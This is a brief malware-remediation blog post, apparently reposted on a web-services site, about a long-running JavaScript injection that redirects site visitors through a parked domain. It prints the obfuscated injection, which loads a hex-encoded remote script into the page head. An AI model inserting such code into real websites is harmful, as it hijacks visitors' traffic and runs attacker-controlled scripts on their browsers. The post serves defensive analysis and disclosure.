Malicious Injection Redirects Traffic via Parked Domain

During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website’s traffic, redirecting visitors via a parked third-party domain to generate ad revenue.

Investigating obfuscated JavaScript

Our investigation revealed the following piece of obfuscated JavaScript which was found injected into random legitimate JavaScript files in the environment.

In most cases, the injection typically looks something like this:

var div_avada=document.createElement(‘script’);div_avada.setAttribute(“type”,”text/javascript”);var all_avada=[“x2Fx2Fx68x74x6Dx6Cx35x2Ex6Fx6Ex6Cx2Fx6Ex61x76x2Ex70x68x70x3F”,”x72x61x6Ex64x6Fx6D”];var b_avada=all_avada[0]+Math[all_avada[1]]();div_avada.setAttribute(“src”,b_avada);if (typeof div_avada!=”undefined”);document.getElementsByTagName(“head”)[0].appendChild(div_avada);

While the variable names used for the injection will vary from site to site, the end result is the same: the injection loads a script from a third-party server, which can pose significant security risks to website traffic when controlled by one or more bad actors.

Continue reading Malicious Injection Redirects Traffic via Parked Domain at .

Posted in

About Us

I believe that everyone should have a mechanic that they can trust and after spending several years helping out various customers for large companies I've seen my fair share of issues.

Honesty, Integrity, and Compassion are what we share with everyone that we work with. Stop scouring the internet for help and see how we can help you today.

Our Services

Website Migrations

Plugin & Theme Updates

IDX Broker Customizations

Facebook Chatbots

DNS & Email Integrations

logo

E-mail: [email protected]